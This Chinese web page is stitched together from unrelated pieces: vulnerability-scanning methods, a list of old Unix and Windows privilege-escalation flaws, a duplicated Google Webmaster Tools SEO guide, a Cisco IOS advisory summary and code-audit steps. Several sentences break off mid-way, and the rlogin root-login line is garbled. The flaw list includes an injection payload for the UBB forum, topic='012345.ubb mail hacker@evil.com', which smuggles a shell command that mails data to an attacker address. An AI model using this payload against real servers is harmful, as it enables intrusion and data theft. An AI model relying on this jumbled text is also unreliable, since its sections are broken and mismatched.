漏洞扫描有以下四种检测技术:
1.基于应用的检测技术。它采用被动的、非破坏性的办法检查应用软件包的设置,发现安全漏洞。
2.基于主机的检测技术。它采用被动的、非破坏性的办法对系统进行检测。通常,它涉及到系统的内核、文件的属性、操作系统的补丁等。这种技术还包括口令解密、把一些简单的口令剔除。因此,这种技术可以非常准确地定位系统的问题,发现系统的漏洞。它的缺点是与平台相关,升级复杂。
3.基于目标的漏洞检测技术。它采用被动的、非破坏性的办法检查系统属性和文件属性,如数据库、注册号等。通过消息文摘算法,对文件的加密数进行检验。这种技术的实现是运行在一个闭环上,不断地处理文件、系统目标、系统目标属性,然后产生检验数,把这些检验数同原来的检验数相比较。一旦发现改变就通知管理员。
4.基于网络的检测技术。它采用积极的、非破坏性的办法来检验系统是否有可能被攻击崩溃。它利用了一系列的脚本模拟对系统进行攻击的行为,然后对结果进行分析。它还针对已知的网络漏洞进行检验。网络检测技术常被用来进行穿透实验和安全审记。这种技术可以发现一系列平台的漏洞,也容易安装。但是,它可能会影响网络的性能。
网络漏洞扫描
在上述四种方式当中,网络漏洞扫描最为适合我们的Web信息系统的风险评估工作,其扫描原理和工作原理为:通过远程检测目标主机TCP/IP不同端口的服务,记录目标的回答。通过这种方法,可以搜集到很多目标主机的各种信息(例如:是否能用匿名登录,是否有可写的FTP目录,是否能用Telnet, ?Cl ?Cfroot,可以直接以root身份登录到系统而无须提供口令。 二.本地管理员权限 攻击者在已有一个本地账号能够登录到系统的情况下,通过攻击本地某些有缺陷的suid程序,竞争条件等手段,得到系统的管理员权限。
典型漏洞: 1、RedHat Linux的restore是个suid程序,它的执行依靠一个中RSH的环境变量,通过设置环境变量PATH,可以使RSH变量中的可执行程序以root身份运行,从而获得系统的root权限。 2、Solaris 7的Xsun程序有suid位,它对输入参数未做有效的边界检查,可以很容易地溢出它的缓冲区,以root身份运行我们指定的代码,从而获得管理员权限。
3、在windows2000下,攻击者就有机会让网络DDE(一种在不同的Windows机器上的应用程序之间动态共享数据的技术)代理在本地系统用户的安全上下文中执行其指定的代码,从而提升权限并完全控制本地机器。 三.普通用户访问权限 攻击者利用服务器的漏洞,取得系统的普通用户存取权限,对UNIX类系统通常是shell访问权限,对Windows系统通常是cmd.exe的访问权限,能够以一般用户的身份执行程序,存取文件。
攻击者通常攻击以非root身份运行的守护进程,有缺陷的cgi程序等手段获得这种访问权限。 典型漏洞: 1、UBB是个广泛运行于各种UNIX和Windows系统的论坛程序,用PERL实现,它的5.19以下版本存在输入验证问题,通过提交精心构造的表单内容,可以使UBB去执行shell命令,因为一般的web服务器以nobody身份运行,因此可以得到一个nobody shell。
比如提交这样的数据:topic='012345.ubb mail hacker@evil.com 2、RedHat Linux 6.2带的innd 2.2.2.3版新闻服务器,存在缓冲区溢出漏洞,通过一个精心构造的新闻信件可以使innd服务器以news身份运行我们指定的代码,得到一个innd权限的shell。 3、Windows IIS 4.0-5.0存在Unicode解码漏洞,可以使攻击者利用cmd.exe以guest组的权限在系统上运行程序。
相当于取得了普通用户的权限。 四.权限提升 攻击者在本地通过攻击某些有缺陷的sgid程序,把自己的权限提升到某个非root用户的水平。
获得管理员权限可以看做是一种特殊的权限提升,只是因为威胁的大小不同而把它独立出来。 典型漏洞: 1、RedHat Linux 6.1带的man程序为sgid man,它存在format bug,通过对它的溢出攻击,可以使攻击者得到man组的用户权限。
2、Solaris 7的write程序为sgid tty,它存在缓冲区溢出问题,通过对它的攻击可以攻击者得到tty组的用户权限。 3、WindowsNT系统中,攻击者能够使系统中其他用户装入一个”特洛化”的porfile,使其他用户执行攻击者的恶意代码,有时甚至是管理员。
爱问网络:
第一:robots文件检查
整个网站不能收录或某个目录下所有页面都不能收录,经常是因为robots.txt文件差错引起的。网管工具抓工具权限部分显示出Google所抓取的robots文件内容。站长也可以在这里试验不同的robots文件指令,然后输入一个网址,测试网址是否可以被收录,或是被禁止。
robots文件中的任何一个字母差错都可能造成致命影响。有了这个工具,站长可以确保robots文件中的每一行代码正确,不会错误禁止应该被收录的文件或目录。
第二:首选域设置
站长可以设置Google应该收录带还是不带的网址版本,称为首选域。
当然,在Google网管工具设置的首选域对百度等其他搜索引擎完全不起作用。这只是解决Google网址规范化的辅助手段,不能完全依靠这个设置,正确合理的网站结构才是解决问题的根本方法。站长也可以在这部分设置网站目标地理区域。
第三:关键词排名
在搜索查询部分,网管工具列出网站获得排名的关键词有哪些,并且列出了搜索结果显示次数、点击次数、点击率和平均排名。
网管工具则列出了网站真是排名及点击数字。这也为SEO人员提供了搜索结果点击分布的另一组数据,可以用于搜索流量预估。不过,要注意的是,网管工具中列出的点击率,很多时候与网站权重、知名度、页面标题标签的写作有很大关系,并不一定符合其他关键词的点击情况。
第四:外部链接
Google的link:指令非常不准确,基本不能用来看外部链接。网管工具中列出的外部链接则要准确的多,还有雅虎的linkdomain:指令查外链也不错。而且可以看出是全站链接还是只链首页。SEO人员可以一目了然的看到网站上哪些页面最受欢迎。
第五:网站内容
网管工具关键词部分实际上列出的是Google在网站上抓取的最常见关键词。查看这些常见关键词,对页面尤其是首页的文案撰写和修改有重要意义。
第六:内部链接
内部链接部分列出所有页面的内部链接数。站长可以从这些数据中大致看到网站内部链接结构是否有重大缺陷。如果全站主导航中出现的分类首页内部链接数非常低,很可能说明导航系统有问题。
内部链接数的另外一个作用是反映出网站收录页面数。Google的site:指令也不太准确,而且现在越来越不准确,经常不能反映出收录数字。网管工具中内部链接部分列出的首页内部链接总数,大致上就相当于Google收录的页面总数,因为网站上每一个页面都应该有到首页的链接。
第七:抓取错误及统计
抓取错误部分列出404错误(页面不存在)、被robots文件禁止而不能收录的页面等。
其中404错误对检查网站上是否存在错误链接很有用。对每个404错误,网管工具都列出了到这个网址的链接。如果到不存在页面的链接是网站内部发出的,说明这些链接页面上的链接地址有错误。如果链接向不存在页面的是其他网站,站长可以尝试联系对方更改错误链接到正确位置。
第八:HTML建议
查看Google的HTML建议是寻找网站上可能出现的复制内容的最简便方法。网管工具列出了重复的说明标签及标题标签个数和具体页面。标题标签重复,实际上说明这些页面本身内容重复,往往是网站结构造成的。要注意的是,有时候网管工具中列出的数据并不完整,一般来说博客上标题标签重复的页面绝不止两页。
第九:模拟蜘蛛抓取
站长可以输入自己网站上的任何一个网址,网管工具会发出Google蜘蛛,实时抓取页面内容,并显示出抓取的HTML代码,包括服务器头信息和页面代码。显然这队站长确认转向设置和检查服务器是否正确返回内容很有帮助。另外,这个工具也可以用来检查页面是否被黑。有的时候hei/k放入的代码会检查浏览器类型,如果是用户使用的普通浏览器访问则返回正常内容,如果是搜索引擎蜘蛛访问,才返回hei/k加上去的垃圾内容和垃圾链接。所以站长自己访问页面看不出任何问题。Google蜘蛛抓取到的却不是站长自己看到的内容。这个工具可以帮助站长检查页面是否存在安全漏洞。
第十:网站性能
网站速度现在越来越被重视,不仅对排名有影响,对用户体验也有很大的影响。
1、TCP数据包问题:在特定版本的IOS中,存在内存泄漏漏洞,可导致DOS工具,美国CERT的一份安全警报如此写道。
2、IPv6路由数据帧头缺陷:IOS可能不能正确的处理IPv6(互联网协议第六版)数据包的特定格式的路由数据头,可能导致一个DOS攻击或者运行任何恶意代码。IPv6是一套可以让我们在互联网上获得更多IP地址一套规范。
3、欺骗性的IP选项漏洞:这是一个IOS在处理具有特定的欺骗性的IP选项的IPv4数据包的时候存在的安全漏洞,据CERT说,它也可以导致DOS攻击或运行任意恶毒代码。
CERT表示,所有三个漏洞都可能导致设备重新加载它的操作系统。这情况下,一种间接的持续性的DOS情况就有可能发生,因为数据包已经不能通过该设备了。
据CERT表示,由于运行IOS的设备可能要针对许多其他的网络来转发数据,因此这种拒绝服务攻击的间接影响所带来的后果可能是 非常严重的。
据思科公司在其安全公告中表示,公司已经发布了针对这些漏洞的补丁软件。据思科公司补充道:它目前还不未得知有利用这些漏洞的攻击出现。不过,据IBM公司互联网安全系统的安全战略主管奥尔曼表示,由于这些漏洞的严重性,用户需要尽快安装补丁软件。据他表示,从他们的监测来看,有许多黑客正在试图利用这些漏洞。
建议使用金山清理专家或360安全卫士,扫描电脑上的漏洞,并修复。
有以下四种检测技术:
1、基于应用的检测技术。
它采用被动的、非破坏性的办法检查应用软件包的设置,发现安全漏洞。
2、基于主机的检测技术。
它采用被动的、非破坏性的办法对系统进行检测。通常,它涉及到系统的内核、文件的属性、操作系统的补丁等。这种技术还包括口令解密、把一些简单的口令剔除。因此,这种技术可以非常准确地定位系统的问题,发现系统的漏洞。它的缺点是与平台相关,升级复杂。
3、基于目标的漏洞检测技术。
它采用被动的、非破坏性的办法检查系统属性和文件属性,如数据库、注册号等。通过消息文摘算法,对文件的加密数进行检验。这种技术的实现是运行在一个闭环上,不断地处理文件、系统目标、系统目标属性,然后产生检验数,把这些检验数同原来的检验数相比较。一旦发现改变就通知管理员。
基于目标的漏洞检测技术。它采用被动的、非破坏性的办法检查系统属性和文件属性,如数据库、注册号等。通过消息文摘算法,对文件的加密数进行检验。这种技术的实现是运行在一个闭环上,不断地处理文件、系统目标、系统目标属性,然后产生检验数,把这些检验数同原来的检验数相比较。一旦发现改变就通知管理员。
4、基于网络的检测技术。
采用积极的、非破坏性的办法来检验系统是否有可能被攻击崩溃。它利用了一系列的脚本模拟对系统进行攻击的行为,然后对结果进行分析。它还针对已知的网络漏洞进行检验。网络检测技术常被用来进行穿透实验和安全审计。这种技术可以发现一系列平台的漏洞,也容易安装。但是,它可能会影响网络的性能。
爱问网络:第一:robots文件检查整个网站不能收录或某个目录下所有页面都不能收录,经常是因为robots.txt文件差错引起的。
网管工具抓工具权限部分显示出Google所抓取的robots文件内容。站长也可以在这里试验不同的robots文件指令,然后输入一个网址,测试网址是否可以被收录,或是被禁止。
robots文件中的任何一个字母差错都可能造成致命影响。有了这个工具,站长可以确保robots文件中的每一行代码正确,不会错误禁止应该被收录的文件或目录。
第二:首选域设置站长可以设置Google应该收录带还是不带的网址版本,称为首选域。当然,在Google网管工具设置的首选域对百度等其他搜索引擎完全不起作用。
这只是解决Google网址规范化的辅助手段,不能完全依靠这个设置,正确合理的网站结构才是解决问题的根本方法。站长也可以在这部分设置网站目标地理区域。
第三:关键词排名在搜索查询部分,网管工具列出网站获得排名的关键词有哪些,并且列出了搜索结果显示次数、点击次数、点击率和平均排名。网管工具则列出了网站真是排名及点击数字。
这也为SEO人员提供了搜索结果点击分布的另一组数据,可以用于搜索流量预估。不过,要注意的是,网管工具中列出的点击率,很多时候与网站权重、知名度、页面标题标签的写作有很大关系,并不一定符合其他关键词的点击情况。
第四:外部链接Google的link:指令非常不准确,基本不能用来看外部链接。网管工具中列出的外部链接则要准确的多,还有雅虎的linkdomain:指令查外链也不错。
而且可以看出是全站链接还是只链首页。SEO人员可以一目了然的看到网站上哪些页面最受欢迎。
第五:网站内容网管工具关键词部分实际上列出的是Google在网站上抓取的最常见关键词。查看这些常见关键词,对页面尤其是首页的文案撰写和修改有重要意义。
第六:内部链接内部链接部分列出所有页面的内部链接数。站长可以从这些数据中大致看到网站内部链接结构是否有重大缺陷。
如果全站主导航中出现的分类首页内部链接数非常低,很可能说明导航系统有问题。内部链接数的另外一个作用是反映出网站收录页面数。
Google的site:指令也不太准确,而且现在越来越不准确,经常不能反映出收录数字。网管工具中内部链接部分列出的首页内部链接总数,大致上就相当于Google收录的页面总数,因为网站上每一个页面都应该有到首页的链接。
第七:抓取错误及统计抓取错误部分列出404错误(页面不存在)、被robots文件禁止而不能收录的页面等。其中404错误对检查网站上是否存在错误链接很有用。
对每个404错误,网管工具都列出了到这个网址的链接。如果到不存在页面的链接是网站内部发出的,说明这些链接页面上的链接地址有错误。
如果链接向不存在页面的是其他网站,站长可以尝试联系对方更改错误链接到正确位置。第八:HTML建议查看Google的HTML建议是寻找网站上可能出现的复制内容的最简便方法。
网管工具列出了重复的说明标签及标题标签个数和具体页面。标题标签重复,实际上说明这些页面本身内容重复,往往是网站结构造成的。
要注意的是,有时候网管工具中列出的数据并不完整,一般来说博客上标题标签重复的页面绝不止两页。第九:模拟蜘蛛抓取站长可以输入自己网站上的任何一个网址,网管工具会发出Google蜘蛛,实时抓取页面内容,并显示出抓取的HTML代码,包括服务器头信息和页面代码。
显然这队站长确认转向设置和检查服务器是否正确返回内容很有帮助。另外,这个工具也可以用来检查页面是否被黑。
有的时候hei/k放入的代码会检查浏览器类型,如果是用户使用的普通浏览器访问则返回正常内容,如果是搜索引擎蜘蛛访问,才返回hei/k加上去的垃圾内容和垃圾链接。所以站长自己访问页面看不出任何问题。
Google蜘蛛抓取到的却不是站长自己看到的内容。这个工具可以帮助站长检查页面是否存在安全漏洞。
第十:网站性能网站速度现在越来越被重视,不仅对排名有影响,对用户体验也有很大的影响。
建立安全模型
1、熟悉软件功能、功能实现,配置等;
如:IIS的虚拟目录、脚本映射;
2、根据功能,分析安全需求,建立安全模型;
IIS外挂,文件类型识别,目录正确识别;目录限制;
外挂的特点;权限不是在文件对象上,需要自己识别文件,所以需要识别出同一个文件的所有文件名;
3、根据安全需求,分析编程应注意的地方,重点检查。
IIS要对../进行检测,连接文件的处理,识别出正确的目录、文件名;编程接口完全按接口实现; 1、通读原代码;
2、安全需求里面重点需要检测的地方;
3、搜索容易有问题的函数调用,如strcpy、strcat、*printf、free、strncpy等;
4、常见一些编程问题;一些变量类型,如长度变量用int,注意一些函数非直接返回赋值问题等,一些边界条件,记数从0开始还是从1开始。
5、分析缓冲区使用的代码;
6、输入输出合法检测;
7、编程接口调用;了解操作系统、基本文件、进程调用等的特性;
8、数据结构;
9、安全领域的最小原则; 1、测试;
(1)、熟悉输入输出;
(2)、根据需要编写测试程序;
(3)、输入输出各种特殊情况测试,特殊字符、长串;
(4)、安全需求需要检测的一些条件测试;
2、反汇编分析;
(1)、阅读理解反汇编代码;
(2)、安全需求检测的代码分析;
(3)、调用接口代码分析;
(4)、sub esp,xxx 代码分析缓冲;
(5)、strcpy、strcat、*printf、free、strncpy等调用分析;
(6)、输入输出检测;
3、跟踪调试;
(1)、异常的拦截分析;
(2)、一些字符串的流向,读写断点; 1、分析总结各种漏洞、漏洞原因、编程问题,补丁修补方法,编程怎么避免。
2、对漏洞归纳分类,全面考虑;
声明:本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载的作品侵犯了您的权利,请在一个月内通知我们,我们会及时删除。
蜀ICP备2020033479号-4 Copyright © 2016 学习鸟. 页面生成时间:4.104秒